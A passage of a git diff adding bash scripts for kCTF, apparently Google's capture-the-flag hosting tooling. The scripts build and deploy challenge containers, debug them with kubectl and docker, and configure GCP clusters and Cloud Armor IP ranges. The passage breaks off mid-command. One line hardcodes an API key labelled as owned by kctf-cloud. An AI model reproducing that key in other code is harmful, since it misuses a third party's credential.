+ OPTS="h" + LONGOPTS="help,container:" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf chal ${COMMAND}" -- "$@") + if [[ $? -ne 0 ]]; then + parse_container_name_usage + exit 1 + fi + eval set -- "$PARSED" + + CONTAINER="challenge" + while true; do + case "$1" in + -h|--help) + parse_container_name_usage + exit 0 + ;; + --container) + CONTAINER="$2" + shift 2 + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." + parse_container_name_usage + exit 1 + ;; + esac + done + + require_active_challenge +} + +function build_image { + # build the image + CONTAINER_NAME="$1" + CONTAINER_DIR="${CHALLENGE_DIR}/${CONTAINER_NAME}" + _kctf_log "building image in \"${CONTAINER_DIR}\"" + IIDFILE="$(mktemp)" + if find "${CONTAINER_DIR}" -type l -exec false {} + >/dev/null 2>/dev/null; then + docker build "${CONTAINER_DIR}" --iidfile "${IIDFILE}" + else + _kctf_log "found symlink, building with tar -czh | docker" + tar -C "${CONTAINER_DIR}" -czh . | docker build --iidfile "${IIDFILE}" - + fi + if [[ $? -ne 0 ]]; then + rm "${IIDFILE}" + return 1 + fi + IMAGE_ID=$(cat "${IIDFILE}") + rm "${IIDFILE}" + + # strip optional sha256 prefix + if [[ "${IMAGE_ID}" = sha256:* ]]; then + IMAGE_ID=$(echo "${IMAGE_ID}" | cut -d ':' -f 2) + fi + _kctf_log "Image ID \"${IMAGE_ID}\"" +} + +function healthcheck_enabled { + [[ $("${KCTF_BIN}/yq" eval 'select(.kind == "Challenge") | .spec.healthcheck.enabled' "${CHALLENGE_DIR}/challenge.yaml") == "true" ]] +} + +function build_images { + build_image challenge || return + CHALLENGE_IMAGE_LOCAL="${IMAGE_ID}" + if healthcheck_enabled; then + build_image healthcheck || return + HEALTHCHECK_IMAGE_LOCAL="${IMAGE_ID}" + fi +} + +function push_image { + IMAGE_NAME=$1 + IMAGE_ID=$2 + + case "${CLUSTER_TYPE}" in + gce) + IMAGE_URL="${REGISTRY}/${PROJECT}/${CHALLENGE_NAME}-${IMAGE_NAME}:${IMAGE_ID}" + docker tag "${IMAGE_ID}" "${IMAGE_URL}" || return + docker push "${IMAGE_URL}" || return + ;; + kind) + IMAGE_URL="kind/${IMAGE_NAME}:${IMAGE_ID}" + docker tag "${IMAGE_ID}" "${IMAGE_URL}" || return + "${KCTF_BIN}/kind" load docker-image --name "${CLUSTER_NAME}" "${IMAGE_URL}" || return + ;; + *) + _kctf_log_err "unknown cluster type \"${CLUSTER_TYPE}\"" + return 1 + ;; + esac + _kctf_log "Image pushed to \"${IMAGE_URL}\"" +} + +function push_images { + push_image "challenge" "${CHALLENGE_IMAGE_LOCAL}" || return + CHALLENGE_IMAGE_REMOTE="${IMAGE_URL}" + if healthcheck_enabled; then + push_image "healthcheck" "${HEALTHCHECK_IMAGE_LOCAL}" || return + HEALTHCHECK_IMAGE_REMOTE="${IMAGE_URL}" + fi +} + +function kctf_chal_start { + require_cluster_config + COMMAND="start" DESCRIPTION="Deploy the challenge to the cluster." parse_help_arg_only $@ || return + build_images || return + push_images || return + + # update challenge.yaml with the image urls + "${KCTF_BIN}/yq" eval "select(.kind == \"Challenge\") | .spec.image = \"${CHALLENGE_IMAGE_REMOTE}\", select(.kind == \"Challenge\" | not)" --inplace "${CHALLENGE_DIR}/challenge.yaml" + if healthcheck_enabled; then + "${KCTF_BIN}/yq" eval "select(.kind == \"Challenge\") | .spec.healthcheck.image = \"${HEALTHCHECK_IMAGE_REMOTE}\", select(.kind == \"Challenge\" | not)" --inplace "${CHALLENGE_DIR}/challenge.yaml" + fi + + "${KCTF_BIN}/kubectl" apply -f "${CHALLENGE_DIR}/challenge.yaml" || return +} + +function kctf_chal_stop { + require_cluster_config + COMMAND="stop" DESCRIPTION="Stop a challenge running on the cluster." parse_help_arg_only $@ || return + "${KCTF_BIN}/kubectl" delete -f "${CHALLENGE_DIR}/challenge.yaml" || return +} + +function kctf_chal_status { + require_cluster_config + COMMAND="status" DESCRIPTION="Print the challenge status." parse_help_arg_only $@ || return + + echo "= CHALLENGE RESOURCE =" + echo + "${KCTF_BIN}/kubectl" get "challenge/${CHALLENGE_NAME}" --namespace "${CHALLENGE_NAMESPACE}" + echo + echo "= INSTANCES / PODs =" + echo + echo "Challenge execution status" + echo "This shows you how many instances of the challenges are running." + echo + "${KCTF_BIN}/kubectl" get pods -l "app=${CHALLENGE_NAME}" -o wide --namespace "${CHALLENGE_NAMESPACE}" + echo + echo + echo "= DEPLOYMENTS =" + echo + echo "Challenge deployment status" + echo "This shows you if the challenge was deployed to the cluster." + echo + "${KCTF_BIN}/kubectl" get deployments -l "app=${CHALLENGE_NAME}" -o wide --namespace "${CHALLENGE_NAMESPACE}" + echo + echo "= EXTERNAL SERVICES =" + echo + echo "Challenge external status" + echo "This shows you if the challenge is exposed externally." + echo + echo "SERVICES:" + "${KCTF_BIN}/kubectl" get services -l "app=${CHALLENGE_NAME}" -o custom-columns="NAME:.metadata.name,TYPE:.spec.type,EXTERNAL-IP:.status.loadBalancer.ingress[*]['ip'],PORT:.spec.ports[*].port,DNS:.metadata.annotations['external-dns\\.alpha\\.kubernetes\\.io/hostname']" --namespace "${CHALLENGE_NAMESPACE}" + echo + echo "Ingresses:" + "${KCTF_BIN}/kubectl" get ingress -l "app=${CHALLENGE_NAME}" -o wide --namespace "${CHALLENGE_NAMESPACE}" +} + +function kctf_chal_debug_logs_usage { + echo -e "usage: kctf chal debug logs [args]" >&2 + echo -e " -h|--help print this help" >&2 + echo -e " --container name of the container to interact with, e.g. challenge (default) or healthcheck" >&2 + echo -e " --tail how many lines to print per pod (default 20)" >&2 +} + +function kctf_chal_debug_logs { + require_cluster_config + + OPTS="h" + LONGOPTS="help,container:,tail:" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf chal ${COMMAND}" -- "$@") + if [[ $? -ne 0 ]]; then + kctf_chal_debug_logs_usage + exit 1 + fi + eval set -- "$PARSED" + + CONTAINER="challenge" + TAIL="20" + while true; do + case "$1" in + -h|--help) + kctf_chal_debug_logs_usage + exit 0 + ;; + --container) + CONTAINER="$2" + shift 2 + ;; + --tail) + TAIL="$2" + shift 2 + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." + kctf_chal_debug_logs_usage + exit 1 + ;; + esac + done + + require_active_challenge + + pods=($("${KCTF_BIN}/kubectl" get pods -l "app=${CHALLENGE_NAME}" -o jsonpath='{.items[*].metadata.name}')) + + if [[ ${#pods[@]} -eq 0 ]]; then + _kctf_log_err 'No pods found. Is the challenge running?' + return 1 + fi + + for pod in "${pods[@]}"; do + startTime=$("${KCTF_BIN}/kubectl" get "pods/${pod}" -o jsonpath='{.status.startTime}') + _kctf_log "== ${pod} (started @ ${startTime}) ==" + "${KCTF_BIN}/kubectl" logs "pods/${pod}" --tail="${TAIL}" -c "${CONTAINER}" --namespace "${CHALLENGE_NAMESPACE}" + done +} + +function kctf_chal_debug_ssh { + require_cluster_config + COMMAND="debug ssh" parse_container_name $@ || return + + pods=($("${KCTF_BIN}/kubectl" get pods -l "app=${CHALLENGE_NAME}" -o jsonpath='{.items[*].metadata.name}')) + + if [[ ${#pods[@]} -eq 0 ]]; then + _kctf_log_err 'No pods found. Is the challenge running?' + return 1 + fi + + pod="${pods[0]}" + if [[ ${#pods[@]} -ne 1 ]]; then + _kctf_log "Found ${#pods[@]} pods, connecting to the most recent one." + _kctf_log "You can list the other pods with 'kubectl get pods'" + _kctf_log "and connect to them using 'kubectl exec pod/PODNAME --namespace ${CHALLENGE_NAMESPACE} -c ${CONTAINER} -it -- /bin/bash'" + + latestStartTime=$(date -d "$("${KCTF_BIN}/kubectl" get "pods/${pod}" -o jsonpath='{.status.startTime}')" '+%s') + for (( i=1; i < ${#pods[@]}; i++ )); do + otherPod="${pods[$i]}" + otherStartTime=$(date -d "$("${KCTF_BIN}/kubectl" get "pods/${otherPod}" -o jsonpath='{.status.startTime}')" '+%s') + if [[ -z "$("${KCTF_BIN}/kubectl" get "pod/${otherPod}" -o jsonpath="{.status.containerStatuses[?(@.name==\"${CONTAINER}\")].state.running}")" ]]; then + _kctf_log_warn "skipping pod/${otherPod} since the container \"${CONTAINER}\" is not running" + continue + fi + if [[ "${otherStartTime}" -gt "${latestStartTime}" ]]; then + latestStartTime="${otherStartTime}" + pod="${otherPod}" + fi + done + fi + + _kctf_log "Connecting to pod ${pod}" + "${KCTF_BIN}/kubectl" exec "pod/${pod}" --namespace "${CHALLENGE_NAMESPACE}" -c "${CONTAINER}" -it -- /bin/bash +} + +function kctf_chal_debug_port_forward_usage { + echo -e "usage: kctf chal debug port-forward [args]" >&2 + echo -e "args:" >&2 + echo -e " -h|--help print this help" >&2 + echo -e " --port: port in the challenge to connect to (default 1337)" >&2 + echo -e " --local-port: local port to listen on (defaults to random free port)" >&2 +} + +function kctf_chal_debug_port_forward { + REMOTE_PORT=1337 + LOCAL_PORT="" + + OPTS="h" + LONGOPTS="help,challenge-name:,port:,local-port:" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf chal debug port-forward" -- "$@") + if [[ $? -ne 0 ]]; then + kctf_chal_debug_port_forward_usage + exit 1 + fi + eval set -- "$PARSED" + + while true; do + case "$1" in + -h|--help) + kctf_chal_debug_port_forward_usage + exit 0 + ;; + --port) + REMOTE_PORT="$2" + shift 2 + ;; + --local-port) + LOCAL_PORT="$2" + shift 2 + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." + kctf_chal_debug_port_forward_usage + exit 1 + ;; + esac + done + + require_active_challenge + + _kctf_log 'starting port-forward, ctrl+c to exit' + "${KCTF_BIN}/kubectl" port-forward "deployment/${CHALLENGE_NAME}" --namespace "${CHALLENGE_NAMESPACE}" --address=127.0.0.1 "${LOCAL_PORT}:${REMOTE_PORT}" +} + +function kctf_chal_debug_docker { + COMMAND="debug docker" parse_container_name $@ || return + + build_image "${CONTAINER}" || return + + DOCKER_NAME="kctf-${KCTF_CTF_NAME}-${CHALLENGE_NAME}-${CONTAINER}" + + # kill any existing containers + docker kill "${DOCKER_NAME}" >/dev/null 2>/dev/null + docker container rm "${DOCKER_NAME}" >/dev/null 2>/dev/null + + _kctf_log "Running docker container ${IMAGE_ID} using name ${DOCKER_NAME}" + docker run -d --name "${DOCKER_NAME}" -it -p 1337 --privileged "${IMAGE_ID}" || return 1 + docker ps -f "name=${DOCKER_NAME}" || return 1 + _kctf_log "Container running, ctrl+c to exit" + docker attach "${DOCKER_NAME}" +} + + +function kctf_chal_debug_usage { + echo -e "usage: kctf chal debug command" >&2 + echo -e "available commands:" >&2 + echo -e " logs: print logs of the container" >&2 + echo -e " ssh: spawn an interactive bash in the container" >&2 + echo -e " port-forward: create a port-forward to the container's default port" >&2 + echo -e " docker: run the docker container locally" >&2 + echo -e "NOTE: you can use --container=healthcheck flag to debug the healthcheck" >&2 +} + +function kctf_chal_debug { + if [[ $# -lt 1 ]]; then + _kctf_log_err "unexpected argument count" + kctf_chal_debug_usage + exit 1 + fi + + case "$1" in + -h|--help) + kctf_chal_debug_usage + exit 0 + ;; + logs) + shift + kctf_chal_debug_logs $@ + ;; + ssh) + shift + kctf_chal_debug_ssh $@ + ;; + port-forward) + shift + kctf_chal_debug_port_forward $@ + ;; + docker) + shift + kctf_chal_debug_docker $@ + ;; + *) + _kctf_log_err "unknown command" + kctf_chal_debug_usage + exit 1 + ;; + esac +} + +function kctf_chal_create_usage { + echo "usage: kctf chal create [args] name" >&2 + echo "args:" >&2 + echo " -h|--help print this help" >&2 + echo " --template which template to use (run --template list to print available templates)" >&2 + echo " --challenge-dir path where to create the new challenge" >&2 + echo " default: \"${KCTF_CTF_DIR}/\${CHALLENGE_NAME}\"" >&2 +} + +function kctf_chal_create { + OPTS="h" + LONGOPTS="help,template:,challenge-dir:" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf chal create" -- "$@") + if [[ $? -ne 0 ]]; then + kctf_chal_create_usage + exit 1 + fi + eval set -- "$PARSED" + + CHALLENGE_DIR= + TEMPLATE=pwn + while true; do + case "$1" in + -h|--help) + kctf_chal_create_usage + exit 0 + ;; + --template) + TEMPLATE="$2" + shift 2 + ;; + --challenge-dir) + CHALLENGE_DIR="$2" + shift 2 + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." + parse_help_arg_only_usage + exit 1 + ;; + esac + done + + if [[ "${TEMPLATE}" == "list" ]]; then + echo "available templates:" + for template in ${KCTF_CTF_DIR}/kctf/challenge-templates/*; do + echo " $(basename ${template})" + done + exit 0 + fi + + if [[ $# -ne 1 ]]; then + _kctf_log_err "kctf chal create: name missing" + kctf_chal_create_usage + exit 1 + fi + + TEMPLATE_DIR="${KCTF_CTF_DIR}/kctf/challenge-templates/${TEMPLATE}" + if [[ ! -e "${TEMPLATE_DIR}/challenge.yaml" ]]; then + _kctf_log_err "kctf chal create: template \"${TEMPLATE}\" not found" + _kctf_log_err " run \"kctf chal create --template list\" to list available templates" + exit 1 + fi + + CHALLENGE_NAME="$1" + shift + + if [[ -z "${CHALLENGE_DIR}" ]]; then + CHALLENGE_DIR="${KCTF_CTF_DIR}/${CHALLENGE_NAME}" + else + CHALLENGE_DIR_REALPATH=$(realpath --canonicalize-missing "${CHALLENGE_DIR}") + if [[ "${CHALLENGE_DIR_REALPATH}" != "${KCTF_CTF_DIR}"/* ]]; then + _kctf_log_err "Challenge dir needs to be under the CTF dir:" + _kctf_log_err " \"${CHALLENGE_DIR_REALPATH}\"" + _kctf_log_err " not under" + _kctf_log_err " \"${KCTF_CTF_DIR}\"" + exit 1 + fi + fi + if [[ -e "${CHALLENGE_DIR}" ]]; then + _kctf_log_err "error: challenge dir \"${CHALLENGE_DIR}\" does already exist" + exit 1 + fi + + mkdir -p $(dirname "${CHALLENGE_DIR}") >/dev/null 2>/dev/null + + umask a+rx + cp -p -r "${TEMPLATE_DIR}" "${CHALLENGE_DIR}" + ${KCTF_BIN}/yq eval ".metadata.name = \"${CHALLENGE_NAME}\"" --inplace "${CHALLENGE_DIR}/challenge.yaml" +} + +function kctf_chal_list { + echo '== challenges in repository ==' + + for challenge_yaml in $(find "${KCTF_CTF_DIR}" -path "${KCTF_CTF_DIR}/kctf" -prune -false -o -name "challenge.yaml"); do + challenge_name=$(${KCTF_BIN}/yq eval "select(.kind == \"Challenge\") | .metadata.name" "${challenge_yaml}") + challenge_dir=$(realpath --relative-to "${KCTF_CTF_DIR}" $(dirname "${challenge_yaml}")) + if [[ "${challenge_name}" == ${challenge_dir} ]]; then + echo "${challenge_name}" + else + echo "${challenge_name} (dir: ${challenge_dir})" + fi + done + + if has_cluster_config; then + echo '== deployed challenges ==' + "${KCTF_BIN}/kubectl" get challenges + fi +} + +function kctf_chal_usage { + echo -e "usage: kctf chal command" >&2 + echo -e "available commands:" >&2 + echo -e " create: create a new challenge from a template" >&2 + echo -e " list: list existing challenges" >&2 + echo -e " start: deploy the challenge to the cluster" >&2 + echo -e " stop: delete the challenge from the cluster" >&2 + echo -e " status: print the current status of the challenge" >&2 + echo -e " debug: commands for debugging the challenge" >&2 +} + +if [[ $# -lt 1 ]]; then + _kctf_log_err "unexpected argument count" + kctf_chal_usage + exit 1 +fi + +case "$1" in + -h|--help) + kctf_chal_usage + exit 0 + ;; + create) + shift + kctf_chal_create $@ + ;; + list) + shift + kctf_chal_list $@ + ;; + start) + shift + kctf_chal_start $@ + ;; + stop) + shift + kctf_chal_stop $@ + ;; + status) + shift + kctf_chal_status $@ + ;; + debug) + shift + kctf_chal_debug $@ + ;; + *) + _kctf_log_err "unknown command" + kctf_chal_usage + exit 1 + ;; +esac + diff --git a/v8ctf/kctf/bin/kctf-cluster b/v8ctf/kctf/bin/kctf-cluster new file mode 100755 index 00000000..823b57f0 --- /dev/null +++ b/v8ctf/kctf/bin/kctf-cluster @@ -0,0 +1,1004 @@ +#!/bin/bash +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +source "${KCTF_BIN}/kctf-log" + +BYE_MSG="" +KCTF_CLOUD_BASE_URL="https://kctf-cloud.appspot.com/v1" +# owned by kctf-cloud +KCTF_CLOUD_API_KEY="AIzaSyC7Jgu4e0IygmImZNPmJHrcfZ3lJA9ZrZs" + +if [[ "$OSTYPE" =~ ^darwin.* ]]; then + GETOPT="$(brew --prefix gnu-getopt)/bin/getopt" +else + GETOPT="getopt" +fi + +function update_gcloud_config { + _kctf_log "Updating gcloud config." + ACTIVE_ACCOUNT="$(CLOUDSDK_ACTIVE_CONFIG_NAME= gcloud config get-value core/account 2>/dev/null)" + export CLOUDSDK_ACTIVE_CONFIG_NAME="kctf-${KCTF_SESSION}" + if ! gcloud config configurations describe "${CLOUDSDK_ACTIVE_CONFIG_NAME}" >/dev/null 2>/dev/null; then + gcloud config configurations create --no-activate "${CLOUDSDK_ACTIVE_CONFIG_NAME}" >/dev/null 2>/dev/null || return + fi + gcloud config set core/account "${ACTIVE_ACCOUNT}" >/dev/null || return + gcloud config set core/project "${PROJECT}" >/dev/null || return + gcloud config set compute/zone "${ZONE}" >/dev/null || return + gcloud config set container/cluster "${CLUSTER_NAME}" >/dev/null || return +} + +function set_lastconfig_link { + ln -sf "${CONFIG_NAME}" "${KCTF_CTF_DIR}/kctf/config/.lastconfig" +} + +function kctf_cluster_load_usage { + echo "usage: kctf cluster load config_name" >&2 + echo " run \"kctf cluster list\" to see a list of options" >&2 +} + +function kctf_cluster_load { + if [[ $# -ne 1 ]]; then + _kctf_log_err "missing config name" + kctf_cluster_load_usage + return 1 + fi + + if [[ "$1" == "-h" ]] || [[ "$1" == "--help" ]]; then + kctf_cluster_load_usage + return 0 + fi + + CONFIG_NAME="$1" + if [[ "${CONFIG_NAME}" == ".lastconfig" ]]; then + CONFIG_NAME=$(readlink "${KCTF_CTF_DIR}/kctf/config/.lastconfig") + if [[ $? -ne 0 ]]; then + _kctf_log_err "could not resolve .lastconfig link" + return 1 + fi + fi + CONFIG_PATH="${KCTF_CTF_DIR}/kctf/config/${CONFIG_NAME}" + shift + + source "${CONFIG_PATH}" || return + + case "${CLUSTER_TYPE}" in + gce) + if ! command -v gcloud >/dev/null 2>&1; then + _kctf_log_err "gcloud not installed" + return 1 + fi + update_gcloud_config || return + + # try to fetch the creds of the k8s cluster + gcloud container clusters get-credentials "${CLUSTER_NAME}" >/dev/null 2>/dev/null + ;; + kind) + kube_config=$("${KCTF_BIN}/kind" get kubeconfig --name "${CLUSTER_NAME}" 2>/dev/null) + if [[ $? -eq 0 ]]; then + echo "${kube_config}" > "${KUBECONFIG}" + fi + ;; + *) + _kctf_log_err "unknown cluster type \"${CLUSTER_TYPE}\"" + return 1 + ;; + esac + + _kctf_log "loaded config" + + set_lastconfig_link + + echo "${CONFIG_NAME}" +} + +function kctf_cluster_list { + echo "== available cluster configurations ==" + for file in ${KCTF_CTF_DIR}/kctf/config/*; do + CONFIG_NAME="$(basename $file)" + if [[ "${CONFIG_NAME}" = ".lastconfig" ]]; then + continue + fi + echo "${CONFIG_NAME}" + done +} + +function kctf_cluster_create_usage { + echo "usage: kctf cluster create [args] config_name" >&2 + echo " -h|--help print this help" >&2 + echo " --type what kind of cluster to create (default: gce)" >&2 + echo " supported values: \"gce\" (remote cluster) and \"kind\" (local cluster)" >&2 + echo " --project Required (gce): Google Cloud Platform project name" >&2 + echo " --zone GCP Zone (default: europe-west4-b)" >&2 + echo " For a list of zones run:" >&2 + echo " gcloud compute machine-types list --filter=\"name=( n2-standard-4 )\" --format 'value(zone)'" >&2 + echo " --registry Container Registry (default: eu.gcr.io)" >&2 + echo " Possible values are us.gcr.io, asia.gcr.io, and eu.gcr.io" >&2 + echo " --cluster-name Name of the kubernetes cluster (default: kctf-cluster)" >&2 + echo " --domain-name Required (gce): domain name to host challenges under" >&2 + echo " Please make sure not to put anything secret in the challenge name." >&2 + echo " Supported options:" >&2 + echo " \"none\": disable DNS support (might break some functionality)" >&2 + echo " \"your.domain.com\": use your own domain. You will have to follow some" >&2 + echo " additional steps to configure your nameserver." >&2 + echo " \"yourname.kctf.cloud\": automatically get a subdomain under kctf.cloud" >&2 + echo " --email-address Optional email address for LetsEncrypt registration (for wildcard certificates)" >&2 + echo " To use it, please read and agree to the ACME Subscriber Agreement:" >&2 + echo " https://letsencrypt.org/repository/" >&2 + echo " --start Start the cluster if it's not running yet" >&2 + echo " --disable-src-ranges Disable the ip range feature (requires --start). Use this if you have security policy quota issues" >&2 +} + +function kctf_cluster_create { + # Default Configuration + CLUSTER_TYPE="gce" + REGISTRY="eu.gcr.io" + PROJECT="" + ZONE="europe-west4-b" + CLUSTER_NAME="kctf-cluster" + DOMAIN_NAME="" + EMAIL_ADDRESS="" + START_CLUSTER="0" + DISABLE_SRC_RANGES="" + + OPTS="h" + LONGOPTS="help,type:,project:,zone:,registry:,cluster-name:,domain-name:,email-address:,start,disable-src-ranges" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf cluster create" -- "$@") + if [[ $? -ne 0 ]]; then + kctf_cluster_create_usage + return 1 + fi + eval set -- "$PARSED" + + while true; do + case "$1" in + -h|--help) + kctf_cluster_create_usage + return 1 + ;; + --type) + CLUSTER_TYPE=$2 + shift 2 + ;; + --project) + PROJECT=$2 + shift 2 + ;; + --zone) + ZONE=$2 + shift 2 + ;; + --registry) + REGISTRY=$2 + shift 2 + ;; + --cluster-name) + CLUSTER_NAME=$2 + shift 2 + ;; + --domain-name) + DOMAIN_NAME="$2" + shift 2 + ;; + --email-address) + EMAIL_ADDRESS="$2" + shift 2 + ;; + --start) + START_CLUSTER="1" + shift + ;; + --disable-src-ranges) + DISABLE_SRC_RANGES="--disable-src-ranges" + shift + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." + kctf_cluster_create_usage + return 1 + ;; + esac + done + + if [[ $# -ne 1 ]]; then + _kctf_log_err "kctf cluster create: cluster config name missing" + kctf_cluster_create_usage + return 1 + fi + + CONFIG_NAME="$1" + if [[ "${CONFIG_NAME}" == ".lastconfig" ]]; then + CONFIG_NAME=$(readlink "${KCTF_CTF_DIR}/kctf/config/.lastconfig") + if [[ $? -ne 0 ]]; then + _kctf_log_err "could not resolve .lastconfig link" + return 1 + fi + fi + CONFIG_PATH="${KCTF_CTF_DIR}/kctf/config/${CONFIG_NAME}" + shift + + case "${CLUSTER_TYPE}" in + gce) + if [[ -z "$PROJECT" ]]; then + _kctf_log_err "Missing required argument \"--project\"." + kctf_cluster_create_usage + return 1 + fi + if [[ -z "${DOMAIN_NAME}" ]]; then + _kctf_log_err "Missing required argument \"--domain-name\"." + kctf_cluster_create_usage + return 1 + fi + ;; + kind) + ;; + *) + _kctf_log_err "unknown cluster type \"${CLUSTER_TYPE}\"" + return 1 + ;; + esac + + if [[ "${DOMAIN_NAME}" == "none" ]]; then + DOMAIN_NAME="" + fi + + + mkdir -p "${KCTF_CTF_DIR}/kctf/config" || return + + if [ -e "${CONFIG_PATH}" ]; then + _kctf_log_warn "Overwriting existing cluster config file. Old content:" + cat "${CONFIG_PATH}" >&2 + rm "${CONFIG_PATH}" >&2 + fi + + cat > "${CONFIG_PATH}" << EOF +CLUSTER_TYPE=${CLUSTER_TYPE} +PROJECT=${PROJECT} +ZONE=${ZONE} +REGISTRY=${REGISTRY} +CLUSTER_NAME=${CLUSTER_NAME} +DOMAIN_NAME=${DOMAIN_NAME} +EMAIL_ADDRESS=${EMAIL_ADDRESS} +EOF + if [[ $? -ne 0 ]]; then return 1; fi + + set_lastconfig_link || return + + case "${CLUSTER_TYPE}" in + gce) + if ! command -v gcloud >/dev/null 2>&1; then + if [[ "${START_CLUSTER}" == "1" ]]; then + _kctf_log_err "Can't start cluster, configuration created only locally. Gcloud not installed." + return 1 + else + _kctf_log_warn "Configuration created only locally. Gcloud not installed." + return 0 + fi + fi + update_gcloud_config || return + # try to fetch the creds of the k8s cluster + gcloud container clusters get-credentials "${CLUSTER_NAME}" >/dev/null 2>/dev/null + GET_CLUSTER_CREDS_RESULT=$? + ;; + kind) + kube_config=$("${KCTF_BIN}/kind" get kubeconfig --name "${CLUSTER_NAME}" 2>/dev/null) + GET_CLUSTER_CREDS_RESULT=$? + if [[ "${GET_CLUSTER_CREDS_RESULT}" -eq 0 ]]; then + echo "${kube_config}" > "${KUBECONFIG}" + fi + ;; + *) + _kctf_log_err "unknown cluster type \"${CLUSTER_TYPE}\"" + return 1 + ;; + esac + + # there might be an existing cluster + # if it already exists, we try to update it + # otherwise, start it if requested + if [[ "${START_CLUSTER}" == "1" ]]; then + if [[ ${GET_CLUSTER_CREDS_RESULT} -eq 0 ]]; then + _kctf_log "Existing cluster found, updating cluster." + else + _kctf_log "Starting cluster." + fi + export CLUSTER_TYPE + export PROJECT + export ZONE + export REGISTRY + export CLUSTER_NAME + export DOMAIN_NAME + export EMAIL_ADDRESS + "${KCTF_BIN}/kctf-cluster" start "${DISABLE_SRC_RANGES}" >&2 || return + elif [[ ${GET_CLUSTER_CREDS_RESULT} -eq 0 ]]; then + _kctf_log_warn "Existing cluster found. If it's running an old version of kCTF, remember to upgrade it with cluster start." + fi + + echo "${CONFIG_NAME}" +} + +function kctf_cluster_get_ip_ranges { + if [[ "${CLUSTER_TYPE}" != "gce" ]]; then + _kctf_log_err "this command is only supported for GCE clusters" + return + fi + + get_cloud_armor_policy || return + _kctf_log "Current IP range: \"$ret\"" +} + +function kctf_cluster_ip_ranges_usage { + echo "usage: kctf cluster set-src-ip-ranges ranges" >&2 + echo " -h|--help print this help" >&2 + echo " ranges ip ranges to allow of the form 1.1.1.1/32,2.2.2.0/24" >&2 +} + +function kctf_cluster_ip_ranges { + if [[ "${CLUSTER_TYPE}" != "gce" ]]; then + _kctf_log_err "this command is only supported for GCE clusters" + return + fi + + OPTS="h" + LONGOPTS="help" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf cluster set-src-ip-ranges" -- "$@") + if [[ $? -ne 0 ]]; then + kctf_cluster_ip_ranges_usage + return 1 + fi + eval set -- "$PARSED" + + while true; do + case "$1" in + -h|--help) + kctf_cluster_ip_ranges_usage + return 1 + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." + kctf_cluster_ip_ranges_usage + return 1 + ;; + esac + done + + if [[ $# -ne 1 ]]; then + _kctf_log_err "kctf cluster set-src-ip-ranges: expecting a single range argument" + kctf_cluster_ip_ranges_usage + return 1 + fi + + RANGES="$1" + + # update the cloud armor policy + set_cloud_armor_policy "${RANGES}" || return + + # stop the operator + "${KCTF_BIN}/yq" eval "select(.kind == \"Deployment\")" "${KCTF_CTF_DIR}/kctf/resources/operator.yaml" \ + | "${KCTF_BIN}/kubectl" delete -f - || return + + start_operator_gce || return +} + +function start_operator_gce { + if [[ "${DISABLE_SRC_RANGES}" == "1" ]]; then + "${KCTF_BIN}/kubectl" apply -f "${KCTF_CTF_DIR}/kctf/resources/operator.yaml" || return + else + get_cloud_armor_policy || return + RANGES=$ret + SUFFIX=$(echo "${PROJECT}-${CLUSTER_NAME}-${ZONE}" | sha1sum) + POLICY_NAME="kctf-policy-${SUFFIX:0:16}" + # restart the operator with the new range + "${KCTF_BIN}/yq" eval "(select(.kind == \"Deployment\").spec.template.spec.containers[] | select(.name == \"manager\").env[] | select(.name == \"ALLOWED_IPS\").value) |= \"${RANGES}\"" "${KCTF_CTF_DIR}/kctf/resources/operator.yaml" \ + | "${KCTF_BIN}/yq" eval "(select(.kind == \"Deployment\").spec.template.spec.containers[] | select(.name == \"manager\").env[] | select(.name == \"SECURITY_POLICY\").value) |= \"${POLICY_NAME}\"" - \ + | "${KCTF_BIN}/kubectl" apply -f - || return + fi +} + +function set_cloud_armor_policy { + SUFFIX=$(echo "${PROJECT}-${CLUSTER_NAME}-${ZONE}" | sha1sum) + POLICY_NAME="kctf-policy-${SUFFIX:0:16}" + gcloud compute security-policies rules update --action allow --security-policy "${POLICY_NAME}" --src-ip-ranges "$1" 0 || return +} + +function get_cloud_armor_policy { + SUFFIX=$(echo "${PROJECT}-${CLUSTER_NAME}-${ZONE}" | sha1sum) + POLICY_NAME="kctf-policy-${SUFFIX:0:16}" + ret=$(gcloud compute security-policies rules describe --security-policy "${POLICY_NAME}" 0 --format 'value[delimiter=","](match.config.srcIpRanges)') +} + +function create_cloud_armor_policy { + SUFFIX=$(echo "${PROJECT}-${CLUSTER_NAME}-${ZONE}" | sha1sum) + POLICY_NAME="kctf-policy-${SUFFIX:0:16}" + if [[ -z $(gcloud compute security-policies list --filter "name="${POLICY_NAME}"" --format 'get(name)') ]]; then + gcloud compute security-policies create "${POLICY_NAME}" || return + gcloud compute security-policies rules create --action allow --security-policy "${POLICY_NAME}" --src-ip-ranges "0.0.0.0/0" 0 || return + + # make sure the default policy (2147483647) is deny + gcloud compute security-policies rules update --action deny-404 --security-policy "${POLICY_NAME}" 2147483647 || return + + set_cloud_armor_policy "0.0.0.0/0" || return + fi +} + +function create_operator { + # Creating CRD, rbac and operator + "${KCTF_BIN}/kubectl" apply -f "${KCTF_CTF_DIR}/kctf/resources/kctf.dev_challenges.yaml" || return + "${KCTF_BIN}/kubectl" apply -f 